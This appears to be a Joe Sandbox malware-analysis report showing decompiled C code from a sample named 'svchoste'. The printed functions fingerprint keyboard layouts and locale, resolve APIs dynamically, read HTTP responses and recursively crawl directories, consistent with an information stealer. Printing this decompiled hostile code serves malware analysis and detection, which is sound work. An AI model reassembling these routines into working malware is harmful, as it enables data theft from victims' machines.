0x00b8ab6a
0x00b8ab70
0x00b8ab32
0x00b8ab4c
0x00b8ab52
0x00b8ab52
0x00b8ab79
0x00b8ab7c
0x00b8ab90
0x00b8ab95
0x00b8aaef
0x00b8aaef
0x00b8aba1
0x00b8aba7
0x00b8aba7
0x00b8abc0

APIs

GetProcessHeap.KERNEL32(00000000,000001F4), ref: 00B8AA7A
HeapAlloc.KERNEL32(00000000), ref: 00B8AA81
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00B8AAA2
LocalAlloc.KERNEL32(00000040,?), ref: 00B8AABA
GetKeyboardLayoutList.USER32(?,00000000), ref: 00B8AACE
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B8AB23
wsprintfA.USER32 ref: 00B8AB4C
wsprintfA.USER32 ref: 00B8AB6A
_memset.LIBCMT ref: 00B8AB90
LocalFree.KERNEL32(00000000), ref: 00B8ABA7

Strings

%s / %s, xrefs: 00B8AB40

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
String ID: %s / %s
API String ID: 2849719339-2910687431
Opcode ID: d345391449b1bd05ef82081d97d70e76becd880e2ee0defac1724b3b4a49c677
Instruction ID: 89e5bfa671081e4457f958c216653e75f4e198a181f780cbcc455c41d1f4fb1f
Opcode Fuzzy Hash: d345391449b1bd05ef82081d97d70e76becd880e2ee0defac1724b3b4a49c677
Instruction Fuzzy Hash: E93138B094021CEBEB64DF68CD8ABE9B7B4EB48304F1081D9E519A7291DB746E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C810, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8C810() {
				CHAR* _t1;
				struct HINSTANCE__* _t2;
				CHAR* _t5;
				struct HINSTANCE__* _t7;
				CHAR* _t10;
				struct HINSTANCE__* _t12;
				CHAR* _t15;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				CHAR* _t27;
				struct HINSTANCE__* _t28;

				_t1 =  *0xba2568; // 0x2d01438
				_t2 = LoadLibraryA(_t1); // executed
				 *0xba274c = _t2;
				if( *0xba274c == 0) {
					return 0;
				}
				_t18 =  *0xba247c; // 0x2d05950
				_t24 =  *0xba274c; // 0x60900000
				 *0xba2750 = GetProcAddress(_t24, _t18);
				_t5 =  *0xba2140; // 0x2d06200
				_t19 =  *0xba274c; // 0x60900000
				 *0xba2700 = GetProcAddress(_t19, _t5);
				_t25 =  *0xba2408; // 0x2d058a8
				_t7 =  *0xba274c; // 0x60900000
				 *0xba2720 = GetProcAddress(_t7, _t25);
				_t20 =  *0xba23f0; // 0x2d06100
				_t26 =  *0xba274c; // 0x60900000
				 *0xba273c = GetProcAddress(_t26, _t20);
				_t10 =  *0xba241c; // 0x2d05f20
				_t21 =  *0xba274c; // 0x60900000
				 *0xba2724 = GetProcAddress(_t21, _t10);
				_t27 =  *0xba25f4; // 0x2d059f8
				_t12 =  *0xba274c; // 0x60900000
				 *0xba2754 = GetProcAddress(_t12, _t27);
				_t22 =  *0xba250c; // 0x2d061e0
				_t28 =  *0xba274c; // 0x60900000
				 *0xba272c = GetProcAddress(_t28, _t22);
				_t15 =  *0xba2650; // 0x2d05e80
				_t23 =  *0xba274c; // 0x60900000
				 *0xba2734 = GetProcAddress(_t23, _t15);
				return 1;
			}

0x00b8c813
0x00b8c819
0x00b8c81f
0x00b8c82b
0x00000000
0x00b8c8fb
0x00b8c831
0x00b8c838
0x00b8c845
0x00b8c84a
0x00b8c850
0x00b8c85d
0x00b8c862
0x00b8c869
0x00b8c875
0x00b8c87a
0x00b8c881
0x00b8c88e
0x00b8c893
0x00b8c899
0x00b8c8a6
0x00b8c8ab
0x00b8c8b2
0x00b8c8be
0x00b8c8c3
0x00b8c8ca
0x00b8c8d7
0x00b8c8dc
0x00b8c8e2
0x00b8c8ef
0x00000000

APIs

LoadLibraryA.KERNEL32(02D01438), ref: 00B8C819
GetProcAddress.KERNEL32(60900000,02D05950), ref: 00B8C83F
GetProcAddress.KERNEL32(60900000,02D06200), ref: 00B8C857
GetProcAddress.KERNEL32(60900000,02D058A8), ref: 00B8C86F
GetProcAddress.KERNEL32(60900000,02D06100), ref: 00B8C888
GetProcAddress.KERNEL32(60900000,02D05F20), ref: 00B8C8A0
GetProcAddress.KERNEL32(60900000,02D059F8), ref: 00B8C8B8
GetProcAddress.KERNEL32(60900000,02D061E0), ref: 00B8C8D1
GetProcAddress.KERNEL32(60900000,02D05E80), ref: 00B8C8E9

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 34e2b6bbe669f8622c19618febeb8f3190aba745d916bf31f6cbbe965a0169dd
Instruction ID: 58f52d65117773d9ed584d066d27ef523dd2a11535964fb52780de338dbdf0e8
Opcode Fuzzy Hash: 34e2b6bbe669f8622c19618febeb8f3190aba745d916bf31f6cbbe965a0169dd
Instruction Fuzzy Hash: 5221FDB5614200AFC748DFADEC9A9267BE9FB4E301700851AFA09C3670DE389D45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B91CF0, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 313
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00B91CF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* _a4) {
				DWORD* _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v76;
				long _v80;
				DWORD* _v84;
				DWORD* _v88;
				char _v351;
				void _v352;
				intOrPtr _v356;
				DWORD* _v360;
				DWORD* _v364;
				DWORD* _v368;
				intOrPtr _v372;
				signed int _v376;
				DWORD* _v380;
				DWORD* _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				int _t191;
				intOrPtr _t193;
				intOrPtr _t205;
				intOrPtr _t215;
				intOrPtr _t243;
				intOrPtr _t251;
				void* _t253;
				intOrPtr _t260;
				intOrPtr _t289;
				signed int _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t350 = __esi;
				_t349 = __edi;
				_t253 = __ebx;
				_push(0xffffffff);
				_push(E00B965F4);
				_push( *[fs:0x0]);
				_t353 = _t352 - 0x19c;
				_t183 =  *0xba01f4; // 0xac8b3e58
				_t184 = _t183 ^ _t351;
				_v20 = _t184;
				_push(_t184);
				 *[fs:0x0] =  &_v16;
				_v420 = __ecx;
				_t186 = _v420;
				_t362 =  *((intOrPtr*)(_t186 + 0x28));
				if( *((intOrPtr*)(_t186 + 0x28)) == 0) {
					 *((intOrPtr*)(_v420 + 0x30)) = 0x7800;
					_push( *((intOrPtr*)(_v420 + 0x30))); // executed
					_t251 = E00B74349(__edi, __esi, _t362); // executed
					_t353 = _t353 + 4;
					_v392 = _t251;
					 *((intOrPtr*)(_v420 + 0x28)) = _v392;
					 *(_v420 + 0x34) = 0;
				}
				_v84 =  *(_v420 + 0x34);
				_v80 = 0;
				_v88 = 0;
				InternetSetFilePointer(_a4, 0, 0, 0, 0);
				do {
					_t191 = InternetReadFile(_a4,  *((intOrPtr*)(_v420 + 0x28)) +  *(_v420 + 0x34), 0x3e8,  &_v80); // executed
					_v88 = _t191;
					 *(_v420 + 0x34) =  *(_v420 + 0x34) + _v80;
					_t193 = _v420;
					_t260 = _v420;
					_t363 =  *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) - 0x3e8;
					if( *((intOrPtr*)(_t193 + 0x30)) -  *((intOrPtr*)(_t260 + 0x34)) <= 0x3e8) {
						 *((intOrPtr*)(_v420 + 0x30)) =  *((intOrPtr*)(_v420 + 0x30)) + 0x7800;
						_push( *((intOrPtr*)(_v420 + 0x30))); // executed
						_t243 = E00B74349(_t349, _t350, _t363); // executed
						_v396 = _t243;
						_v356 = _v396;
						E00B79240(_v356,  *((intOrPtr*)(_v420 + 0x28)),  &(( *(_v420 + 0x34))[0]));
						_v400 =  *((intOrPtr*)(_v420 + 0x28));
						_push(_v400); // executed
						E00B75122(); // executed
						_t353 = _t353 + 0x14;
						 *((intOrPtr*)(_v420 + 0x28)) = _v356;
					}
				} while (_v88 != 0 && _v80 > 0);
				_v80 = 0x103;
				_v352 = 0;
				E00B791C0( &_v351, 0, 0x103);
				_t354 = _t353 + 0xc;
				if(HttpQueryInfoA(_a4, 0x1d,  &_v352,  &_v80, 0) != 0) {
					_v368 = 0;
					_v360 = 0;
					_v364 = 0;
					_v364 =  *0xba27a8(0xb971e0, 0, 1, 0xb971d0,  &_v368);
					if(_v364 >= 0) {
						_t369 = _v368;
						if(_v368 != 0) {
							E00B711C0( &_v48,  &_v352);
							_v8 = 0;
							_t205 = E00B91BE0(_t253, _t349, _t350, _t369,  &_v76,  &_v48);
							_t355 = _t354 + 8;
							_v424 = _t205;
							_v428 = _v424;
							_v8 = 1;
							_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v368 + 0x10))))(_v368, E00B720E0(_v428), L"text",  &_v360);
							_v8 = 0;
							E00B720C0( &_v76);
							_v8 = 0xffffffff;
							E00B712D0( &_v48);
							if(_v364 >= 0) {
								_t371 = _v360;
								if(_v360 != 0) {
									_v376 = ( *(_v420 + 0x34) - _v84) * 7;
									_t215 = E00B74349(_t349, _t350, _t371);
									_t356 = _t355 + 4;
									_v404 = _t215;
									_v372 = _v404;
									_v384 = 0;
									_v380 = 0;
									_v364 =  *((intOrPtr*)( *((intOrPtr*)( *_v360 + 0x10))))(_v360, 0,  *(_v420 + 0x34) - _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84, _v376, _v372,  *(_v420 + 0x34) - _v84,  &_v380,  &_v384, 0, _v376);
									if(_v364 >= 0) {
										_t289 = _v420;
										_t373 =  *((intOrPtr*)(_t289 + 0x30)) - _v84 + _v384;
										if( *((intOrPtr*)(_t289 + 0x30)) <= _v84 + _v384) {
											 *((intOrPtr*)(_v420 + 0x30)) = _v84 +  &(_v384[0xfa]);
											_push( *((intOrPtr*)(_v420 + 0x30)));
											_v408 = E00B74349(_t349, _t350, _t373);
											_v388 = _v408;
											E00B7518C( *((intOrPtr*)(_v420 + 0x30)), _v388,  *((intOrPtr*)(_v420 + 0x30)),  *((intOrPtr*)(_v420 + 0x28)), _v84);
											_v412 =  *((intOrPtr*)(_v420 + 0x28));
											_push(_v412);
											E00B75122();
											_t356 = _t356 + 0x18;
											 *((intOrPtr*)(_v420 + 0x28)) = _v388;
										}
										E00B7518C( *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x28)) + _v84,  *((intOrPtr*)(_v420 + 0x30)) - _v84, _v372, _v384);
										_t356 = _t356 + 0x10;
										 *(_v420 + 0x34) = _v84 + _v384;
									}
									_v416 = _v372;
									E00B75122();
									 *((intOrPtr*)( *((intOrPtr*)( *_v360 + 8))))(_v360, _v416);
								}
							}
							 *((intOrPtr*)( *((intOrPtr*)( *_v368 + 8))))(_v368);
						}
					}
				}
				 *( *((intOrPtr*)(_v420 + 0x28)) +  *(_v420 + 0x34)) = 0;
				 *[fs:0x0] = _v16;
				return E00B74354( *(_v420 + 0x34) - _v84, _t253, _v20 ^ _t351,  *(_v420 + 0x34), _t349, _t350);
			}

0x00b91cf0
0x00b91cf0
0x00b91cf0
0x00b91cf3
0x00b91cf5
0x00b91d00
0x00b91d01
0x00b91d07
0x00b91d0c
0x00b91d0e
0x00b91d11
0x00b91d15
0x00b91d1b
0x00b91d21
0x00b91d27
0x00b91d2b
0x00b91d33
0x00b91d43
0x00b91d44
0x00b91d49
0x00b91d4c
0x00b91d5e
0x00b91d67
0x00b91d67
0x00b91d77
0x00b91d7a
0x00b91d81
0x00b91d94
0x00b91d9a
0x00b91dba
0x00b91dc0
0x00b91dd5
0x00b91dd8
0x00b91dde
0x00b91dea
0x00b91df0
0x00b91e0b
0x00b91e17
0x00b91e18
0x00b91e20
0x00b91e2c
0x00b91e50
0x00b91e61
0x00b91e6d
0x00b91e6e
0x00b91e73
0x00b91e82
0x00b91e82
0x00b91e85
0x00b91e95
0x00b91e9c
0x00b91eb1
0x00b91eb6
0x00b91ed4
0x00b91eda
0x00b91ee4
0x00b91eee
0x00b91f13
0x00b91f20
0x00b91f26
0x00b91f2d
0x00b91f3d
0x00b91f42
0x00b91f51
0x00b91f56
0x00b91f59
0x00b91f65
0x00b91f6b
0x00b91f9b
0x00b91fa1
0x00b91fa8
0x00b91fad
0x00b91fb7
0x00b91fc3
0x00b91fc9
0x00b91fd0
0x00b91fe5
0x00b91ff2
0x00b91ff7
0x00b91ffa
0x00b92006
0x00b9200c
0x00b92016
0x00b9207b
0x00b92088
0x00b92097
0x00b9209d
0x00b920a0
0x00b920bc
0x00b920c8
0x00b920d1
0x00b920dd
0x00b92102
0x00b92113
0x00b9211f
0x00b92120
0x00b92125
0x00b92134
0x00b92134
0x00b9215f
0x00b92164
0x00b92176
0x00b92176
0x00b9217f
0x00b9218c
0x00b921a6
0x00b921a6
0x00b91fd0
0x00b921ba
0x00b921ba
0x00b91f2d
0x00b91f20
0x00b921ce
0x00b921e1
0x00b921f6

APIs

InternetSetFilePointer.WININET(00B9280B,00000000,00000000,00000000,00000000), ref: 00B91D94
InternetReadFile.WININET(00B9280B,?,000003E8,00000000), ref: 00B91DBA
_memset.LIBCMT ref: 00B91EB1
HttpQueryInfoA.WININET(00B9280B,0000001D,00000000,00000103,00000000), ref: 00B91ECC

Part of subcall function 00B91BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B91C32
Part of subcall function 00B91BE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00B9654F,000000FF,AC8B3E58,?,?,?,?,?,?,?,00000000,00B9654F), ref: 00B91C79

_memcpy_s.LIBCMT ref: 00B92102
_memcpy_s.LIBCMT ref: 00B9215F

Strings

text, xrefs: 00B91F76

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: ByteCharFileInternetMultiWide_memcpy_s$HttpInfoPointerQueryRead_memset
String ID: text
API String ID: 2061621289-999008199
Opcode ID: 89d3453715207c639354a28f2003c2ff03fb01e74fbefa8d163cf3501df2b764
Instruction ID: 985b1645f24d4e02d1589ef48cee7e3a117c039bc3425334216280e4f659caf4
Opcode Fuzzy Hash: 89d3453715207c639354a28f2003c2ff03fb01e74fbefa8d163cf3501df2b764
Instruction Fuzzy Hash: 6DF1E3B5A012289FDB25CF58CC90BDAB7B5BF49300F5081D8E509AB391DB71AE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B8E640, Relevance: 7.7, APIs: 5, Instructions: 236
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B8E640(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				char* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t103;
				int _t108;
				intOrPtr* _t109;
				int _t111;
				intOrPtr* _t113;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t118;
				void* _t119;
				intOrPtr _t120;
				void* _t121;
				void* _t143;
				CHAR* _t144;
				char _t146;
				char _t151;
				CHAR* _t153;
				char _t170;
				char _t171;
				void* _t197;
				void* _t198;
				signed int _t199;
				void* _t200;
				void* _t201;
				void* _t203;
				void* _t204;

				_t198 = __esi;
				_t197 = __edi;
				_t143 = __ebx;
				_t103 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t103 ^ _t199;
				_t144 =  *0xba24d0; // 0x2d067c0
				_t172 =  &_v276;
				wsprintfA( &_v276, _t144, _a8);
				_t201 = _t200 + 0xc;
				_t108 = FindFirstFileA( &_v276,  &_v604); // executed
				_v280 = _t108;
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t109 = _v876;
							_t146 =  *_t109;
							_v877 = _t146;
							if(_t146 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t113 = _v896;
										_t151 =  *_t113;
										_v897 = _t151;
										if(_t151 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												_t153 =  *0xba22bc; // 0x2d00540
												wsprintfA( &_v868, _t153, _a8,  &(_v604.cFileName));
												_t116 =  *0xba22d0; // 0x2d068e0
												_t117 = E00B752FA(_t198,  &(_v604.cFileName), _t116);
												_t203 = _t201 + 0x18;
												if(_t117 != 0) {
													_t118 =  *0xba20e4; // 0x2d06720
													_t119 = E00B752FA(_t198,  &(_v604.cFileName), _t118);
													_t204 = _t203 + 8;
													if(_t119 != 0) {
														_t120 =  *0xba2154; // 0x2d06ad8
														_t121 = E00B752FA(_t198,  &(_v604.cFileName), _t120);
														_t201 = _t204 + 8;
														if(_t121 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E00B8E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
																_t201 = _t201 + 0x14;
															}
														} else {
															E00B8DA80(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
															_push(_a20);
															_push(_a16);
															E00B8B7B0(_t143, _t197, _t198,  &_v868, _a4, _a12); // executed
															E00B8E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
															_t201 = _t201 + 0x3c;
														}
													} else {
														E00B8DCA0(_t143, _t197, _t198,  &_v868, _a4, _a12, _a16, _a20); // executed
														E00B8E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
														_t201 = _t204 + 0x28;
													}
												} else {
													E00B8E0E0(_t143, _t197, _t198, _a4,  &_v868, _a12, _a16, _a20); // executed
													E00B8E640(_t143, _t197, _t198,  &(_v604.cFileName),  &_v868, _a12, _a16, _a20); // executed
													_t201 = _t203 + 0x28;
												}
												goto L27;
											}
											goto L18;
										}
										_t113 = _v896;
										_t170 =  *((intOrPtr*)(_t113 + 1));
										_v898 = _t170;
										_t41 = _v892 + 1; // 0x2e00002e
										if(_t170 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t113;
									goto L17;
								}
							}
							_t109 = _v876;
							_t171 =  *((intOrPtr*)(_t109 + 1));
							_v878 = _t171;
							_t19 =  &(_v872[1]); // 0x2e000000
							if(_t171 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 =  &(_v872[2]);
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t109;
						goto L9;
						L27:
						_t172 =  &_v604;
						_t111 = FindNextFileA(_v280,  &_v604); // executed
					} while (_t111 != 0);
					_t108 = FindClose(_v280); // executed
					goto L29;
				} else {
					L29:
					return E00B74354(_t108, _t143, _v8 ^ _t199, _t172, _t197, _t198);
				}
			}

0x00b8e640
0x00b8e640
0x00b8e640
0x00b8e649
0x00b8e650
0x00b8e657
0x00b8e65e
0x00b8e665
0x00b8e66b
0x00b8e67c
0x00b8e682
0x00b8e68f
0x00b8e696
0x00b8e696
0x00b8e6a6
0x00b8e6ac
0x00b8e6ac
0x00b8e6b2
0x00b8e6b4
0x00b8e6c2
0x00000000
0x00000000
0x00b8e6cb
0x00b8e6fe
0x00b8e6fe
0x00b8e715
0x00b8e71b
0x00b8e728
0x00b8e7c2
0x00000000
0x00b8e72e
0x00b8e72e
0x00b8e73e
0x00b8e744
0x00b8e744
0x00b8e74a
0x00b8e74c
0x00b8e75a
0x00000000
0x00000000
0x00b8e763
0x00b8e796
0x00b8e796
0x00b8e7ad
0x00b8e7b3
0x00b8e7c0
0x00b8e7d2
0x00b8e7e0
0x00b8e7e9
0x00b8e7f6
0x00b8e7fb
0x00b8e800
0x00b8e848
0x00b8e855
0x00b8e85a
0x00b8e85f
0x00b8e8a7
0x00b8e8b4
0x00b8e8b9
0x00b8e8be
0x00b8e92b
0x00b8e947
0x00b8e94c
0x00b8e94c
0x00b8e8c0
0x00b8e8d7
0x00b8e8e2
0x00b8e8e6
0x00b8e8f6
0x00b8e918
0x00b8e91d
0x00b8e91d
0x00b8e861
0x00b8e878
0x00b8e89a
0x00b8e89f
0x00b8e89f
0x00b8e802
0x00b8e819
0x00b8e83b
0x00b8e840
0x00b8e840
0x00000000
0x00b8e800
0x00000000
0x00b8e7c0
0x00b8e765
0x00b8e76b
0x00b8e76e
0x00b8e77a
0x00b8e77d
0x00000000
0x00000000
0x00b8e77f
0x00b8e786
0x00b8e794
0x00000000
0x00000000
0x00000000
0x00b8e794
0x00b8e7a2
0x00b8e7a4
0x00b8e7a7
0x00000000
0x00b8e7a7
0x00b8e728
0x00b8e6cd
0x00b8e6d3
0x00b8e6d6
0x00b8e6e2
0x00b8e6e5
0x00000000
0x00000000
0x00b8e6e7
0x00b8e6ee
0x00b8e6fc
0x00000000
0x00000000
0x00000000
0x00b8e6fc
0x00b8e70a
0x00b8e70c
0x00b8e70f
0x00000000
0x00b8e94f
0x00b8e94f
0x00b8e95d
0x00b8e963
0x00b8e972
0x00000000
0x00b8e691
0x00b8e978
0x00b8e985
0x00b8e985

APIs

wsprintfA.USER32 ref: 00B8E665
FindFirstFileA.KERNEL32(?,?), ref: 00B8E67C
FindNextFileA.KERNEL32(000000FF,?), ref: 00B8E95D
FindClose.KERNEL32(000000FF), ref: 00B8E972

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 6259bf7ff0c53524c74382f1ceab711bad5c9aa8529668169eff30bd3e6788c8
Instruction ID: 91fb7ed0f252148a61dbb9813365e2e5d0297af478229d75bc0ff7030829d9d6
Opcode Fuzzy Hash: 6259bf7ff0c53524c74382f1ceab711bad5c9aa8529668169eff30bd3e6788c8
Instruction Fuzzy Hash: E0A140B6904258ABCB25DF68DC85EDAB7F9BB58300F0486C9F52993251E631DF84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B86D00, Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B86D00(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, void* _a4, long _a8) {
				long _v8;
				intOrPtr _v12;
				struct _FILETIME _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				struct _SYSTEMTIME _v48;
				void* _v52;
				signed int _t79;
				intOrPtr _t84;
				long _t86;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t105;
				intOrPtr _t120;
				intOrPtr _t122;
				long _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t144;

				_t143 = __esi;
				_t142 = __edi;
				_t108 = __ebx;
				_t79 =  *0xba01f4; // 0xac8b3e58
				_v32 = _t79 ^ _t144;
				_v52 = __ecx;
				 *(_v52 + 0x7c) = 0;
				 *(_v52 + 0x84) = 0;
				 *((char*)(_v52 + 0x80)) = 0;
				 *(_v52 + 0x78) = 0;
				 *(_v52 + 0x70) = 0;
				_t131 = _v52;
				 *(_v52 + 0x90) = 0;
				 *(_v52 + 0x74) = 0;
				if(_a4 != 0 && _a4 != 0xffffffff) {
					_t86 = SetFilePointer( *(_v52 + 4), 0, 0, 1); // executed
					_v8 = _t86;
					if(_v8 == 0xffffffff) {
						 *((intOrPtr*)(_v52 + 0x4c)) = 0x80000000;
						 *(_v52 + 0x70) = 0xffffffff;
						if(_a8 != 0) {
							 *(_v52 + 0x70) = _a8;
						}
						 *((char*)(_v52 + 0x6c)) = 0;
						GetLocalTime( &_v48);
						SystemTimeToFileTime( &_v48,  &_v20);
						_t135 = _v20.dwLowDateTime;
						E00B82EB0(_t135, _v20.dwHighDateTime,  &_v28,  &_v24);
						_t93 = E00B82F70(_v20.dwLowDateTime, _v20.dwHighDateTime);
						_t120 = _v52;
						 *((intOrPtr*)(_t120 + 0x50)) = _t93;
						 *(_t120 + 0x54) = _t135;
						_t136 = _v52;
						_t94 = _v52;
						 *((intOrPtr*)(_t136 + 0x58)) =  *((intOrPtr*)(_t94 + 0x50));
						 *((intOrPtr*)(_t136 + 0x5c)) =  *((intOrPtr*)(_t94 + 0x54));
						_t122 = _v52;
						_t137 = _v52;
						 *((intOrPtr*)(_t122 + 0x60)) =  *((intOrPtr*)(_t137 + 0x50));
						 *((intOrPtr*)(_t122 + 0x64)) =  *((intOrPtr*)(_t137 + 0x54));
						_t131 = _v52;
						 *(_v52 + 0x68) = _v24 & 0x0000ffff | (_v28 & 0x0000ffff) << 0x00000010;
						 *(_v52 + 0x7c) = _a4;
						_t84 = 0;
					} else {
						_t131 = _v52 + 0x70;
						_t105 = E00B84DA0(__ebx, _v52 + 0x70, __edi, __esi, _a4, _v52 + 0x4c, _v52 + 0x70, _v52 + 0x50, _v52 + 0x68); // executed
						_v12 = _t105;
						if(_v12 == 0) {
							SetFilePointer(_a4, 0, 0, 0); // executed
							 *((char*)(_v52 + 0x6c)) = 1;
							_t131 = _a4;
							 *(_v52 + 0x7c) = _a4;
							_t84 = 0;
						} else {
							_t84 = _v12;
						}
					}
				} else {
					_t84 = 0x10000;
				}
				return E00B74354(_t84, _t108, _v32 ^ _t144, _t131, _t142, _t143);
			}

0x00b86d00
0x00b86d00
0x00b86d00
0x00b86d06
0x00b86d0d
0x00b86d10
0x00b86d16
0x00b86d20
0x00b86d2d
0x00b86d37
0x00b86d41
0x00b86d48
0x00b86d4b
0x00b86d58
0x00b86d63
0x00b86d82
0x00b86d88
0x00b86d8f
0x00b86df9
0x00b86e03
0x00b86e0e
0x00b86e16
0x00b86e16
0x00b86e1c
0x00b86e24
0x00b86e32
0x00b86e44
0x00b86e48
0x00b86e58
0x00b86e60
0x00b86e63
0x00b86e66
0x00b86e69
0x00b86e6c
0x00b86e72
0x00b86e78
0x00b86e7b
0x00b86e7e
0x00b86e84
0x00b86e8a
0x00b86e9a
0x00b86e9d
0x00b86ea6
0x00b86ea9
0x00b86d91
0x00b86da2
0x00b86db1
0x00b86db9
0x00b86dc0
0x00b86dd4
0x00b86ddd
0x00b86de4
0x00b86de7
0x00b86dea
0x00b86dc2
0x00b86dc2
0x00b86dc2
0x00b86dc0
0x00b86d6b
0x00b86d6b
0x00b86d6b
0x00b86eb8

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00B86D82
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B86DD4

Memory Dump Source

